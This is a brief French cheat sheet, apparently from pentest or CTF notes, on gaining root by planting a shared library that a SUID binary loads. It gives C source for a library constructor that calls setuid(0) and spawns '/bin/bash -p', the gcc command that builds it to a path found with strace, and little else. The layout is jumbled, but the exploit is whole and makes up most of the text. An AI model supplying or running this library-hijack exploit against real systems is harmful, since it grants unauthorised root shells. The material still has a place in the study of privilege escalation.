Injection de code lors de l’exécution d’un binaire suid
suid injection #include <stdio.h> #include <stdlib.h> toinject.c gcc -shared -fPIC -o /home/user/.config/libcalc.so toinject.c #par exemple, en utilisant strace, on se rend compte que le binaire essaie de charger /home/user/.config/libcalc.so toinject.c static void inject() __attribute__((constructor)); void inject() { setuid(0); system("/bin/bash -p"); }